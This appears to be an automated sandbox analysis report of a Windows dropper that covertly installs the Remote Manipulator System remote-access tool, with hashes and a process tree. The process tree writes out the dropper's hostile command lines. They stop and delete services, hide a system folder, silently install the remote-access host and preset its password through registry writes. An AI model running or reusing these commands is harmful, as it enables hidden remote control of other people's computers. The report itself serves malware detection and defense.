Analysis
- max time kernel: 139s
- max time network: 149s
- platform: windows7_x64
- resource: win7-20220901-en
- resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
- submitted: 28-11-2022 09:31

Behavioral task: behavioral1
- Sample: c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe
- Resource: win7-20220901-en

General
- Target: c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe
- Size: 3.4MB
- MD5: bd24c43e22dd3f94763301227fcfaee4
- SHA1: 4751e53b9427b17f0dcc11ccd0f8a6867295fc5c
- SHA256: c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2
- SHA512: 60c4bf3c419549d9cabb233ffb0e2aa0c4a6e00df1d9a94cbbc938a85e9becd71f3137b1ed9cfe1fb48ef62e3b58a670dc0c2308304693caf308465fcf84aefe
- SSDEEP: 98304:W23AzXk1YNwo3rtNJ7nRYorYHcdCUfxV:WeAzXSO3ZX7morqEb5
Malware Config
Signatures
- Executes dropped EXE (7 IoCs)
  Processes:
  - PID 1356 rutserv.exe
  - PID 1704 rutserv.exe
  - PID 1916 rutserv.exe
  - PID 804 rutserv.exe
  - PID 1652 rfusclient.exe
  - PID 1848 rfusclient.exe
  - PID 672 rfusclient.exe
- Sets file to hidden (1 TTPs, 1 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
- Stops running service(s) (3 TTPs)
- YARA rule matches:
  - resource behavioral1/memory/1492-55-0x0000000000400000-0x000000000078A000-memory.dmp, yara_rule upx
  - resource behavioral1/memory/1160-77-0x0000000002350000-0x00000000029F9000-memory.dmp, yara_rule upx
- Loads dropped DLL (2 IoCs)
  Processes:
  - PID 1160 cmd.exe
  - PID 804 rutserv.exe
- Drops file in Windows directory (17 IoCs)
  Processes (description, ioc, process):
  - File created: C:\Windows\spom\15971.bat (cmd.exe)
  - File opened for modification: C:\Windows\spom\15971.bat (cmd.exe)
  - File created: C:\Windows\spom\rutserv.exe (cmd.exe)
  - File created: C:\Windows\spom\vp8encoder.dll (cmd.exe)
  - File opened for modification: C:\Windows\spom\webmmux.dll (cmd.exe)
  - File created: C:\Windows\spom\rfusclient.exe (cmd.exe)
  - File opened for modification: C:\Windows\spom\rfusclient.exe (cmd.exe)
  - File opened for modification: C:\Windows\spom\webmvorbisdecoder.dll (cmd.exe)
  - File opened for modification: C:\Windows\spom (attrib.exe)
  - File created: C:\Windows\spom\vp8decoder.dll (cmd.exe)
  - File opened for modification: C:\Windows\spom\vp8decoder.dll (cmd.exe)
  - File created: C:\Windows\spom\webmmux.dll (cmd.exe)
  - File created: C:\Windows\spom\webmvorbisencoder.dll (cmd.exe)
  - File opened for modification: C:\Windows\spom\rutserv.exe (cmd.exe)
  - File opened for modification: C:\Windows\spom\vp8encoder.dll (cmd.exe)
  - File created: C:\Windows\spom\webmvorbisdecoder.dll (cmd.exe)
  - File opened for modification: C:\Windows\spom\webmvorbisencoder.dll (cmd.exe)
- Launches sc.exe (2 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes:
  - PID 1648 sc.exe
  - PID 868 sc.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes:
  - PID 1356 rutserv.exe (×4)
  - PID 1704 rutserv.exe (×2)
  - PID 1916 rutserv.exe (×2)
  - PID 804 rutserv.exe (×4)
  - PID 1652 rfusclient.exe (×1)
- Suspicious behavior: SetClipboardViewer (1 IoCs)
  Processes:
  - PID 672 rfusclient.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, PID 1356 rutserv.exe
  - Token: SeDebugPrivilege, PID 1916 rutserv.exe
  - Token: SeTakeOwnershipPrivilege, PID 804 rutserv.exe
  - Token: SeTcbPrivilege, PID 804 rutserv.exe
  - Token: SeTcbPrivilege, PID 804 rutserv.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
  - PID 1356 rutserv.exe
  - PID 1704 rutserv.exe
  - PID 1916 rutserv.exe
  - PID 804 rutserv.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (each parent-to-child write was recorded 4 times):
  - PID 1492 c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe wrote to memory of PID 1160 cmd.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1064 net.exe (×4)
  - PID 1064 net.exe wrote to memory of PID 296 net1.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 592 net.exe (×4)
  - PID 592 net.exe wrote to memory of PID 332 net1.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 868 sc.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1648 sc.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1136 reg.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 524 attrib.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1356 rutserv.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1704 rutserv.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 932 reg.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1392 reg.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1600 reg.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1220 reg.exe (×4)
  - PID 1160 cmd.exe wrote to memory of PID 1908 reg.exe (×4)
- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes (nested by parent/child)
- C:\Users\Admin\AppData\Local\Temp\c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c569486f1c29e1ac32999c682c6e32667d9e30d10879eba649a44cc7a530d0e2.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\14C9.tmp\15971.bat" "
    Signatures: Loads dropped DLL; Drops file in Windows directory; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe
      Command line: net stop netaservice
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 stop netaservice
    - C:\Windows\SysWOW64\net.exe
      Command line: net stop rmanservice
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 stop rmanservice
    - C:\Windows\SysWOW64\sc.exe
      Command line: sc delete netaservice
      Signatures: Launches sc.exe
    - C:\Windows\SysWOW64\sc.exe
      Command line: sc delete rmanservice
      Signatures: Launches sc.exe
    - C:\Windows\SysWOW64\reg.exe
      Command line: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
    - C:\Windows\SysWOW64\attrib.exe
      Command line: attrib +s +h "C:\Windows\spom"
      Signatures: Sets file to hidden; Drops file in Windows directory; Views/modifies file attributes
    - C:\Windows\spom\rutserv.exe
      Command line: "rutserv.exe" /silentinstall
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
    - C:\Windows\spom\rutserv.exe
      Command line: "rutserv.exe" /firewall
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d …
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034003
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d …
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d …
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
    - C:\Windows\SysWOW64\reg.exe
      Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d …
    - C:\Windows\spom\rutserv.exe
      Command line: "rutserv.exe" /start
      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
- C:\Windows\spom\rutserv.exe
  Command line: C:\Windows\spom\rutserv.exe
  Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
  - C:\Windows\spom\rfusclient.exe
    Command line: C:\Windows\spom\rfusclient.exe
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
    - C:\Windows\spom\rfusclient.exe
      Command line: C:\Windows\spom\rfusclient.exe /tray
      Signatures: Executes dropped EXE; Suspicious behavior: SetClipboardViewer
  - C:\Windows\spom\rfusclient.exe
    Command line: C:\Windows\spom\rfusclient.exe /tray
    Signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\15971.bat
  Filesize: 10KB
  MD5: 3aa2d2d6003b6e054840f39c2b4b6eea
  SHA1: 29acb0d579b6914df1599c10c9222ec101f63375
  SHA256: cb90f99378b2ceffbf359d1762c246cffe4b2731b218d22854125eb387d3cfd9
  SHA512: 96908ee5cff277e0a58d7b0b8648e661c81cf43df5dd2d7452c54efed29a42a2a5dc8a33084c4fb0343d169d7da8c88d1817b69d9c43bbd933348ae6716169ad
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\rfusclient.exe
  Filesize: 1.3MB
  MD5: 314f4d76a82e024a1c0facb46f0dbc0a
  SHA1: c8437c555755302a47229cdc18b58d0ee961d00f
  SHA256: 9c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
  SHA512: b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\rutserv.exe
  Filesize: 1.4MB
  MD5: a329f920e01574d2c58eb0626abef7bd
  SHA1: 2500ca31396264cf0a9492d879e493a9438404b9
  SHA256: 76fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
  SHA512: dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\vp8decoder.dll
  Filesize: 127KB
  MD5: bda3c03c3e5d65922a311009e0ae8cd6
  SHA1: 37093c457ac5f01649b4d23a3d075a531af08baa
  SHA256: 30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
  SHA512: eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\vp8encoder.dll
  Filesize: 238KB
  MD5: 200cba4b9cbdd64f1a281b89cd1467f3
  SHA1: fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
  SHA256: c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
  SHA512: 15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\webmmux.dll
  Filesize: 90KB
  MD5: aa78ed008f72533c7136bf6d4bddb0d0
  SHA1: 2e9abd74e615adc99f561cbdbe6067dfd81a406a
  SHA256: 41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
  SHA512: e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\webmvorbisdecoder.dll
  Filesize: 141KB
  MD5: 0867a260483876336a727cf9f2928b13
  SHA1: 3c8c59bfba6ed2aeef35c0d1fc4689683df1e660
  SHA256: cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
  SHA512: b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
- C:\Users\Admin\AppData\Local\Temp\14C9.tmp\webmvorbisencoder.dll
  Filesize: 202KB
  MD5: 43adc4acd56c56b0a25664954c7aa80c
  SHA1: d9085625b4a39b3969db8047ad3224b3fc9f60fc
  SHA256: 0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
  SHA512: 346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
- C:\Windows\spom\rfusclient.exe
  Filesize: 1.3MB
  MD5: 314f4d76a82e024a1c0facb46f0dbc0a
  SHA1: c8437c555755302a47229cdc18b58d0ee961d00f
  SHA256: 9c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
  SHA512: b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
- C:\Windows\spom\rutserv.exe
  Filesize: 1.4MB
  MD5: a329f920e01574d2c58eb0626abef7bd
  SHA1: 2500ca31396264cf0a9492d879e493a9438404b9
  SHA256: 76fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
  SHA512: dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
- C:\Windows\spom\vp8decoder.dll
  Filesize: 127KB
  MD5: bda3c03c3e5d65922a311009e0ae8cd6
  SHA1: 37093c457ac5f01649b4d23a3d075a531af08baa
  SHA256: 30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
  SHA512: eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
- C:\Windows\spom\vp8encoder.dll
  Filesize: 238KB
  MD5: 200cba4b9cbdd64f1a281b89cd1467f3
  SHA1: fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
  SHA256: c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
  SHA512: 15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
- C:\Windows\spom\webmmux.dll
  Filesize: 90KB
  MD5: aa78ed008f72533c7136bf6d4bddb0d0
  SHA1: 2e9abd74e615adc99f561cbdbe6067dfd81a406a
  SHA256: 41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
  SHA512: e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
- C:\Windows\spom\webmvorbisdecoder.dll
  Filesize: 141KB
  MD5: 0867a260483876336a727cf9f2928b13
  SHA1: 3c8c59bfba6ed2aeef35c0d1fc4689683df1e660
  SHA256: cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
  SHA512: b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
- C:\Windows\spom\webmvorbisencoder.dll
  Filesize: 202KB
  MD5: 43adc4acd56c56b0a25664954c7aa80c
  SHA1: d9085625b4a39b3969db8047ad3224b3fc9f60fc
  SHA256: 0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
  SHA512: 346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
- \Windows\spom\rfusclient.exe
  Filesize: 1.3MB
  MD5: 314f4d76a82e024a1c0facb46f0dbc0a
  SHA1: c8437c555755302a47229cdc18b58d0ee961d00f
  SHA256: 9c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
  SHA512: b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
- \Windows\spom\rutserv.exe
  Filesize: 1.4MB
  MD5: a329f920e01574d2c58eb0626abef7bd
  SHA1: 2500ca31396264cf0a9492d879e493a9438404b9
  SHA256: 76fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
  SHA512: dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
- memory/296-59-0x0000000000000000-mapping.dmp
- memory/332-61-0x0000000000000000-mapping.dmp
- memory/524-65-0x0000000000000000-mapping.dmp
- memory/592-60-0x0000000000000000-mapping.dmp
- memory/672-118-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/672-115-0x0000000000000000-mapping.dmp
- memory/756-89-0x0000000000000000-mapping.dmp
- memory/804-119-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)
- memory/804-121-0x0000000002880000-0x0000000002E2E000-memory.dmp (Filesize: 5.7MB)
- memory/804-109-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)
- memory/804-110-0x0000000002880000-0x0000000002E2E000-memory.dmp (Filesize: 5.7MB)
- memory/868-62-0x0000000000000000-mapping.dmp
- memory/932-84-0x0000000000000000-mapping.dmp
- memory/1064-58-0x0000000000000000-mapping.dmp
- memory/1136-64-0x0000000000000000-mapping.dmp
- memory/1160-77-0x0000000002350000-0x00000000029F9000-memory.dmp (Filesize: 6.7MB)
- memory/1160-56-0x0000000000000000-mapping.dmp
- memory/1220-87-0x0000000000000000-mapping.dmp
- memory/1356-74-0x0000000000000000-mapping.dmp
- memory/1356-78-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)
- memory/1356-79-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)
- memory/1392-85-0x0000000000000000-mapping.dmp
- memory/1492-55-0x0000000000400000-0x000000000078A000-memory.dmp (Filesize: 3.5MB)
- memory/1492-54-0x0000000076BA1000-0x0000000076BA3000-memory.dmp (Filesize: 8KB)
- memory/1600-86-0x0000000000000000-mapping.dmp
- memory/1648-63-0x0000000000000000-mapping.dmp
- memory/1652-112-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/1652-120-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/1652-104-0x0000000000000000-mapping.dmp
- memory/1704-80-0x0000000000000000-mapping.dmp
- memory/1704-83-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)
- memory/1848-114-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/1848-105-0x0000000000000000-mapping.dmp
- memory/1848-122-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/1896-90-0x0000000000000000-mapping.dmp
- memory/1908-88-0x0000000000000000-mapping.dmp
- memory/1916-113-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)
- memory/1916-91-0x0000000000000000-mapping.dmp
- memory/1916-94-0x0000000000400000-0x0000000000AA9000-memory.dmp (Filesize: 6.7MB)